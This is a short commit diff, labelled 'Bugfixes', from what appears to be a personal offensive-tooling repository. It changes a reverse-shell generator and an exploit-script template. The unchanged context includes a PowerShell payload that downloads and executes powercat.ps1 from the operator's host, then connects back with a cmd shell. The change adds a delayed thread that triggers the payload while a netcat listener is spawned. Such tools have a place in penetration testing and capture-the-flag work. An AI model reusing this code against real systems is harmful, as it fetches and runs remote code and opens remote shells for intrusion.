Bugfixes

genRevShell.py

@@ -4,6 +4,8 @@ import socket
 import sys
 import pty
 import util
+import time
+import threading
 
 def generatePayload(type, local_address, port):
 
@@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
         return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
 
 def triggerShell(func, port):
-    func()
+    def _wait_and_exec():
+        time.sleep(1.5)
+        func()
+
+    threading.Thread(target=_wait_and_exec).start()
     pty.spawn(["nc", "-lvvp", str(port)])
 
 

template.py

@@ -5,21 +5,23 @@ import sys
 def generateTemplate(baseUrl):
     template = """#!/usr/bin/env python
 
-import requests
-import base64
+import sys
 import json
+import base64
+import requests
 from bs4 import BeautifulSoup
 from hackingscripts import util, fileserver
+
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
-BASE_URL = "%s"
+BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
 
 def login(username, password):
     # Template method to create a session
     session = requests.Session()
     post_data = { "username": username, "password": password }
-    res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
+    res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
     if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
         print("Login failed")
         exit()
@@ -29,8 +31,9 @@ def exploit(session, payload):
     # Template method to exploit an endpoint
     pass
 
-session = login()
-exploit(session, "id")
+if __name__ == "__main__":
+    session = login()
+    exploit(session, "id")
 """ % baseUrl
 
     return template